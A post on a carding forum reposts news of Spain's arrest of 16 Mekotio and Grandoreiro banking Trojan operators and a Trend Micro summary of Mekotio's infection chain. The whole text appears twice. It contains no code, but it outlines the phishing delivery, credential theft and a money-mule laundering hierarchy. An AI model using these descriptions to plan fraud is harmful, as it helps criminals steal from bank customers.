Carding Forum
Professional
- Messages
- 2,788
- Reaction score
- 1,187
- Points
- 113
Spanish law enforcement officials have arrested 16 people linked to the use of the Mekotio and Grandoreiro banking Trojans as part of a malicious campaign targeting financial institutions in Europe.
The arrests were made in Ribeira (La Coruna), Madrid, Parla and Mostoles (Madrid), Sesegna (Toledo), Villafranca de los Barros (Badajoz) and Aranda de Duero (Burgos) during the Aguas Vivas operation. According to the police, using malicious software installed on the victim's computer, criminals could transfer large amounts of money to their accounts.
The police confiscated computer equipment, mobile phones and documents, as well as analyzed more than 1.8 thousand spam emails, which allowed law enforcement agencies to successfully block attempts at transactions totaling 3.5 million euros. The proceeds of the criminals amounted to 276,470 euros, of which 87 thousand euros were successfully returned.
Cyber scammers sent phishing emails to potential victims ostensibly on behalf of legitimate delivery services and government agencies, such as the Spanish Treasury. In the emails, users were asked to click on a link that quietly downloaded malicious software to their computer system.
The Mekotio and Grandoreiro malware allow operators to intercept transactions on the bank's website and illegally redirect funds to accounts under the control of intruders. To carry out fraudulent purposes, criminals hacked at least 68 email accounts belonging to official authorities.
Grandoreiro and Mekotio (also known as Melcoz) are part of a family of Brazilian banking Trojans that also includes the Guildma and Javali malware. Active since at least 2016, Grandoreiro has been used to target users in Brazil, Mexico, Spain, Portugal, and Turkey. Mekotio, on the other hand, was seen in attacks targeting Brazil starting in 2018, and then operators started attacking users in Chile, Mexico, and Spain.
Mekotio allows you to steal passwords from browsers and device memory, providing remote access to Internet banking operations. The malware also contains functionality for stealing Bitcoin wallet addresses.
• Source: http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853
---
The Mekotio and Grandoreiro Trojans are believed to have been created by Brazilian hack groups that sell access to their tools to other criminals, who are already spreading malware and money laundering.
Both Trojans are designed for Windows machines and are usually distributed using fake emails that mimic messages from various real organizations. After infecting the victim, the Trojans hide and wait for the user to log in to e-banking in order to steal their credentials unnoticed.
Thus, malware can steal credentials for 30 different banks. Once attackers gain access to victims ' bank accounts, they transfer funds to accounts under their own control.
Law enforcement officials say that the organization of criminals was structured and had a four-level hierarchy. On the one hand, there were those who were engaged in receiving fraudulent transfers (level 1), which they later transferred to other members of the group (level 2). On the other hand, there were those who transferred money to other accounts located abroad (level 3), and finally, those who were engaged in disguising the operations of the hack group (level 4).
"A feature that was noted by all the victims: after performing any banking operation via the Internet, their computers started to reboot and continued until access was blocked. Later it was discovered that at this time large amounts of money were transferred to unknown accounts, - representatives of Guardia Civil say. — After that, the money was divided by sending to other accounts, withdrawing cash from ATMs, transfers using BIZUM, REVOLUT cards, and so on. All this was done to complicate a possible investigation."
Let me remind you that last year Kaspersky Lab experts already warned that Grandoreiro and Melcoz had expanded their attacks and reached users in Europe, North and Latin America. As the company now notes, Spain has recently suffered the most from banker attacks, right after Brazil, which is "native" for malware carriers.
Experts regret to emphasize that the persons arrested in Spain were only operators. That is, the creators of Grandoreiro and Melcoz remain at large in Brazil, will continue to develop malvari and will be able to attract new participants to their "business".
• Video:
-----
Mekotio: Updated banking Trojan targets Latin America
Latin American financial institutions are facing a new threat in the form of the banking Trojan Mekotio, also known as Melcoz. According to a recent report from Trend Micro, there has been an increase in cyber attacks related to the distribution of this malware for Windows.
The Mekotio trojan has been active since 2015 and targets Latin American countries such as Brazil, Chile, Mexico, Spain, Peru, and Portugal to steal bank data. It was first documented by ESET in August 2020. Mekotio is part of a group of banking Trojans, including Guildma, Javali and Grandoreiro.
ESET experts at one time noted that Mekotio has the characteristic features of such malware: it is written in Delphi, uses fake pop-up windows, has remote access functions, and is aimed at countries where Spanish and Portuguese are spoken.
The Mekotio distribution operation suffered a blow in July 2021, when Spanish law enforcement authorities arrested 16 people involved in social engineering campaigns aimed at European users.
The chain of attacks identified by Trend Micro experts leading to the infection of Mekotio begins with phishing emails on the topic of taxes, which encourage recipients to open malicious attachments or follow fake links, which leads to downloading an MSI file of the installer that uses the AutoHotkey script (AHK) to launch the Trojan.
This process of infecting Mekotio differs from the previous one described by Check Point in November 2021, which used an intricate batch script that runs PowerShell to download a ZIP file with the AHK script.
After installation, Mekotio collects system information and communicates with the C2 server for further instructions. The main purpose of the Trojan is to steal bank data by displaying fake pop-up windows that mimic legitimate banking sites. It can also take screenshots, record keystrokes, steal data from the clipboard, and ensure its permanent presence on an infected device.
The stolen information allows attackers to gain unauthorized access to users ' bank accounts and make fraudulent transactions. Trend Micro emphasize that Mekotio is a persistent and ever-evolving threat to financial systems, especially in Latin American countries.
• Source: https://www.trendmicro.com/en_us/research/24/g/mekotio-banking-trojan.html
• Source: https://research.checkpoint.com/202...with-improved-stealth-and-ancient-encryption/
The arrests were made in Ribeira (La Coruna), Madrid, Parla and Mostoles (Madrid), Sesegna (Toledo), Villafranca de los Barros (Badajoz) and Aranda de Duero (Burgos) during the Aguas Vivas operation. According to the police, using malicious software installed on the victim's computer, criminals could transfer large amounts of money to their accounts.
The police confiscated computer equipment, mobile phones and documents, as well as analyzed more than 1.8 thousand spam emails, which allowed law enforcement agencies to successfully block attempts at transactions totaling 3.5 million euros. The proceeds of the criminals amounted to 276,470 euros, of which 87 thousand euros were successfully returned.
Cyber scammers sent phishing emails to potential victims ostensibly on behalf of legitimate delivery services and government agencies, such as the Spanish Treasury. In the emails, users were asked to click on a link that quietly downloaded malicious software to their computer system.
The Mekotio and Grandoreiro malware allow operators to intercept transactions on the bank's website and illegally redirect funds to accounts under the control of intruders. To carry out fraudulent purposes, criminals hacked at least 68 email accounts belonging to official authorities.
Grandoreiro and Mekotio (also known as Melcoz) are part of a family of Brazilian banking Trojans that also includes the Guildma and Javali malware. Active since at least 2016, Grandoreiro has been used to target users in Brazil, Mexico, Spain, Portugal, and Turkey. Mekotio, on the other hand, was seen in attacks targeting Brazil starting in 2018, and then operators started attacking users in Chile, Mexico, and Spain.
Mekotio allows you to steal passwords from browsers and device memory, providing remote access to Internet banking operations. The malware also contains functionality for stealing Bitcoin wallet addresses.
• Source: http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853
---
The Mekotio and Grandoreiro Trojans are believed to have been created by Brazilian hack groups that sell access to their tools to other criminals, who are already spreading malware and money laundering.
Both Trojans are designed for Windows machines and are usually distributed using fake emails that mimic messages from various real organizations. After infecting the victim, the Trojans hide and wait for the user to log in to e-banking in order to steal their credentials unnoticed.
Thus, malware can steal credentials for 30 different banks. Once attackers gain access to victims ' bank accounts, they transfer funds to accounts under their own control.
Law enforcement officials say that the organization of criminals was structured and had a four-level hierarchy. On the one hand, there were those who were engaged in receiving fraudulent transfers (level 1), which they later transferred to other members of the group (level 2). On the other hand, there were those who transferred money to other accounts located abroad (level 3), and finally, those who were engaged in disguising the operations of the hack group (level 4).
"A feature that was noted by all the victims: after performing any banking operation via the Internet, their computers started to reboot and continued until access was blocked. Later it was discovered that at this time large amounts of money were transferred to unknown accounts, - representatives of Guardia Civil say. — After that, the money was divided by sending to other accounts, withdrawing cash from ATMs, transfers using BIZUM, REVOLUT cards, and so on. All this was done to complicate a possible investigation."
Let me remind you that last year Kaspersky Lab experts already warned that Grandoreiro and Melcoz had expanded their attacks and reached users in Europe, North and Latin America. As the company now notes, Spain has recently suffered the most from banker attacks, right after Brazil, which is "native" for malware carriers.
Experts regret to emphasize that the persons arrested in Spain were only operators. That is, the creators of Grandoreiro and Melcoz remain at large in Brazil, will continue to develop malvari and will be able to attract new participants to their "business".
• Video:
-----
Mekotio: Updated banking Trojan targets Latin America
Latin American financial institutions are facing a new threat in the form of the banking Trojan Mekotio, also known as Melcoz. According to a recent report from Trend Micro, there has been an increase in cyber attacks related to the distribution of this malware for Windows.
The Mekotio trojan has been active since 2015 and targets Latin American countries such as Brazil, Chile, Mexico, Spain, Peru, and Portugal to steal bank data. It was first documented by ESET in August 2020. Mekotio is part of a group of banking Trojans, including Guildma, Javali and Grandoreiro.
ESET experts at one time noted that Mekotio has the characteristic features of such malware: it is written in Delphi, uses fake pop-up windows, has remote access functions, and is aimed at countries where Spanish and Portuguese are spoken.
The Mekotio distribution operation suffered a blow in July 2021, when Spanish law enforcement authorities arrested 16 people involved in social engineering campaigns aimed at European users.
The chain of attacks identified by Trend Micro experts leading to the infection of Mekotio begins with phishing emails on the topic of taxes, which encourage recipients to open malicious attachments or follow fake links, which leads to downloading an MSI file of the installer that uses the AutoHotkey script (AHK) to launch the Trojan.
This process of infecting Mekotio differs from the previous one described by Check Point in November 2021, which used an intricate batch script that runs PowerShell to download a ZIP file with the AHK script.
After installation, Mekotio collects system information and communicates with the C2 server for further instructions. The main purpose of the Trojan is to steal bank data by displaying fake pop-up windows that mimic legitimate banking sites. It can also take screenshots, record keystrokes, steal data from the clipboard, and ensure its permanent presence on an infected device.
The stolen information allows attackers to gain unauthorized access to users ' bank accounts and make fraudulent transactions. Trend Micro emphasize that Mekotio is a persistent and ever-evolving threat to financial systems, especially in Latin American countries.
• Source: https://www.trendmicro.com/en_us/research/24/g/mekotio-banking-trojan.html
• Source: https://research.checkpoint.com/202...with-improved-stealth-and-ancient-encryption/
